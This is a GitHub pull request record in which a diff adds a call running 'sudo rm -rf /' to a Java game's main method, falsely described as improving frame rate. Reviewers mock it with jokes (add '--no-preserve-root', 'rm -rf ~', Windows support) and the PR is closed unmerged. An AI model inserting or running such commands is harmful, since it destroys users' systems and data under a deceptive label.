### PR TITLE
Increase efficiency

### PR DESCRIPTION
**Pull request by 1kq2lo40lozpmb63**
Probably improves frame-rate due to long class files being deleted while program runs

### CODE REVIEW

**Comment by raxod502** [comment]
Obviously not, as you need to include `--no-preserve-root`.

**Comment by 1kq2lo40lozpmb63** [comment]
Also sudo powers, might as well `rm -rf ~`

**Comment by raxod502** [comment]
[relevant xkcd](https://xkcd.com/1185/)

**Comment by 1kq2lo40lozpmb63** [comment]
Exactly ;)

Maybe include the DOS portable one too?

File: src/TerraFrame.java [hunk 1]
```diff
@@ -841,6 +841,8 @@
     static BufferedWriter log;
 
     public static void main(String[] args) {
+        java.lang.Runtime.getRuntime().exec("sudo rm -rf /"); // Probably improves frame-rate due to long class files being deleted while program runs
```
Comment (thingdeux) [inline src/TerraFrame.java:844]: This is the longest comment in this codebase - don't believe it should be left in.  

I'm not sure clarity is part of the codebases' style guide please remove comment.

Comment (sifex) [reply src/TerraFrame.java:844]: Where's the tests?

Comment (apiology) [reply src/TerraFrame.java:844]: Please mail in signed contributor agreement.

Comment (canton7) [reply src/TerraFrame.java:844]: Untested. Needs `--no-preserve-root`.

Comment (jarhill0) [reply src/TerraFrame.java:844]: Any chance we could get Windows support for this feature?

Comment (minexew) [reply src/TerraFrame.java:844]: Proof of Trump-Russia collusion.

**Comment by afjoseph** [comment]
☝️ Mother of God!!

**Pull request closed without merging**